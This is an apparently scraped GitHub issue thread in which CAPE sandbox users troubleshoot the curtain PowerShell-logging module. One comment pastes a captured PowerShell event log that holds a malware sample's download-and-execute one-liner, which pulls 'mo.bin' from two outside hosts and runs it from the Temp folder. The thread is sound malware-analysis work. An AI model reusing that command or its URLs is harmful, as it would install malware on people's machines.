Comments (22)
nop, i will check this
from cape.
Are the curtain dependencies listed in the fireeye blog the ones listed in the comments below the blog URL? Or are these in addition to the blog?
from cape.
in config you have all deps which you need, I would also suggest to upgrade WMF 4 to WMF 5 for powershell5 support
from cape.
I see a curtain.log file in my analysis folder, however there is no curtain tab on the results page.
from cape.
check the log if there are details, if no, you have missing some deps
from cape.
there are 2 full events in the log file
from cape.
can you share it to check? removing your username inside
from cape.
<root>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>4100</EventID><Version>1</Version><Level>3</Level><Task>106</Task><Opcode>19</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:43.628864400Z'/><EventRecordID>11</EventRecordID><Correlation ActivityID='{02AC0C48-F800-0001-4DBA-6F6D6814D401}'/><Execution ProcessID='2944' ThreadID='2232'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData><Data Name='ContextInfo'> Severity = Warning
Host Name = ConsoleHost
Host Version = 5.1.14409.1005
Host ID = 01199e23-61d0-4e5d-82ac-674361ed7c53
Host Application = powershell function otpmldctt([string] $beikul){(new-object system.net.webclient).downloadfile($beikul,'C:\Users\user1\AppData\Local\Temp\ypqrdrb.exe');start-process 'C:\Users\user1\AppData\Local\Temp\ypqrdrb.exe';}try{otpmldctt('http://sabarasourcing.com/mo.bin')}catch{otpmldctt('http://ayuhas.co.in/mo.bin')}
Engine Version = 5.1.14409.1005
Runspace ID = 91c2b171-5620-44e6-8180-a7a93a625ec2
Pipeline ID = 1
Command Name = Start-Process
Command Type = Cmdlet
Script Name =
Command Path =
Sequence Number = 16
User = user1-PC\user1
Connected User =
Shell ID = Microsoft.PowerShell
</Data><Data Name='UserData'></Data><Data Name='Payload'>Error Message = This command cannot be run due to the error: The specified executable is not a valid application for this OS platform..
Fully Qualified Error ID = InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand
</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>4100</EventID><Version>1</Version><Level>3</Level><Task>106</Task><Opcode>19</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:42.599262600Z'/><EventRecordID>10</EventRecordID><Correlation ActivityID='{02AC0C48-F800-0001-4CBA-6F6D6814D401}'/><Execution ProcessID='2944' ThreadID='2232'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData><Data Name='ContextInfo'> Severity = Warning
Host Name = ConsoleHost
Host Version = 5.1.14409.1005
Host ID = 01199e23-61d0-4e5d-82ac-674361ed7c53
Host Application = powershell function otpmldctt([string] $beikul){(new-object system.net.webclient).downloadfile($beikul,'C:\Users\user1\AppData\Local\Temp\ypqrdrb.exe');start-process 'C:\Users\user1\AppData\Local\Temp\ypqrdrb.exe';}try{otpmldctt('http://sabarasourcing.com/mo.bin')}catch{otpmldctt('http://ayuhas.co.in/mo.bin')}
Engine Version = 5.1.14409.1005
Runspace ID = 91c2b171-5620-44e6-8180-a7a93a625ec2
Pipeline ID = 1
Command Name = Start-Process
Command Type = Cmdlet
Script Name =
Command Path =
Sequence Number = 15
User = user1-PC\user1
Connected User =
Shell ID = Microsoft.PowerShell
</Data><Data Name='UserData'></Data><Data Name='Payload'>Error Message = This command cannot be run due to the error: The specified executable is not a valid application for this OS platform..
Fully Qualified Error ID = InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand
</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>40962</EventID><Version>1</Version><Level>4</Level><Task>4</Task><Opcode>2</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:38.574455500Z'/><EventRecordID>9</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-32BA-6F6D6814D401}'/><Execution ProcessID='2944' ThreadID='2400'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>53504</EventID><Version>1</Version><Level>4</Level><Task>111</Task><Opcode>10</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:38.324855100Z'/><EventRecordID>8</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-32BA-6F6D6814D401}'/><Execution ProcessID='2944' ThreadID='2012'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData><Data Name='param1'>2944</Data><Data Name='param2'>DefaultAppDomain</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>40961</EventID><Version>1</Version><Level>4</Level><Task>4</Task><Opcode>1</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:38.246854900Z'/><EventRecordID>7</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-32BA-6F6D6814D401}'/><Execution ProcessID='2944' ThreadID='2400'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>40962</EventID><Version>1</Version><Level>4</Level><Task>4</Task><Opcode>2</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:35.782050600Z'/><EventRecordID>6</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-29BA-6F6D6814D401}'/><Execution ProcessID='3016' ThreadID='2852'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>53504</EventID><Version>1</Version><Level>4</Level><Task>111</Task><Opcode>10</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:33.644846800Z'/><EventRecordID>5</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-29BA-6F6D6814D401}'/><Execution ProcessID='3016' ThreadID='2664'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData><Data Name='param1'>3016</Data><Data Name='param2'>DefaultAppDomain</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>40961</EventID><Version>1</Version><Level>4</Level><Task>4</Task><Opcode>1</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:33.145646000Z'/><EventRecordID>4</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-29BA-6F6D6814D401}'/><Execution ProcessID='3016' ThreadID='2852'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData></EventData></Event>
</root>
from cape.
weird, the log is fine, can you share sample to test here?
from cape.
MD5 - 23c982cd033934dd1f173e4e6bcd8c0b if you have access to VT.
I believe I've already submitted to CAPE instance.
from cape.
ok i just executed standalone curtain on log it returns empty dict
im not sure but i think it related to Error Message = This command cannot be run due to the error: The specified executable is not a valid application for this OS platform.. Fully Qualified Error ID = InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand
i will check it better tomorrow
from cape.
testing your sample
from cape.
thanks, I see that it ran on CAPE instance without that error. Not sure why the VM is behaving that way. It's a 64-bit WIn7 w/SP1 and just the curtain dependencies.
from cape.
win7sp1x32, i think your problem related to that error
from cape.
Is there something I need to do to get powershell scripts to run in Windows VMs? I can't seem to get this to run in my 64-bit VM, but it runs on the CAPE instance 64-bit VM just fine.
from cape.
https://github.com/karttoon/curtain
from cape.
@doomedraven Can you give me some context for this? Is this to help troubleshoot why my PS is not executing?
By the way, I am running version 5.1
from cape.
i got you incorrectly, so it works in vm with cape but not in standalone vm?
from cape.
My 64-bit Win 7 VM generates the PS error when I run it on my Cuckoo instance. When I run on the Ctxis CAPE instance on a 64-bit VM it runs without the error. I'm trying to figure out why my 64-bit VM is giving me the PS error.
from cape.
no idea sorry
from cape.
@enzok i just checked, the main problem is what the aux conf isn't passed to vm, so it can't be configured, to disable it, you need to set do_run=False in analyzer/windows/modules/auxiliary/curtain.py
from cape.
thanks for checking.
from cape.
Related Issues (20)
- Alembic not updating db properly HOT 5
- Error when installing from requirements.txt HOT 4
- VPN not selectable in Web Interface HOT 36
- x64 DLL Extraction module doesn't work HOT 1
- Which commit was capemon.dll compiled from HOT 4
- Small bug on web UI submission template HOT 1
- File not detected as being in VT HOT 2
- Injection vs Extraction HOT 4
- Agent.py HOT 3
- KeyError: (<weakref at 0x7fbf4a8f5d68; to 'function' at 0x7fbf43b9dd90 (go)>,) HOT 4
- Permission for Scraping https://www.capesandbox.com/analysis/ HOT 2
- [Feature Request] Add support for Unfurl HOT 1
- Invalid URL under C2Server HOT 1
- Memory Dump on proxmox HOT 1
- Samples not analyzed on Linux guest (Ubuntu 18.04 32-bits) HOT 2
- The PCAP file does not exist
- Result Server Binding error HOT 1
- Cape Sandbox linux analysis
- Linux Analysis of Cape Sandbox
- Getting zero mal score in linux analysis
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from cape.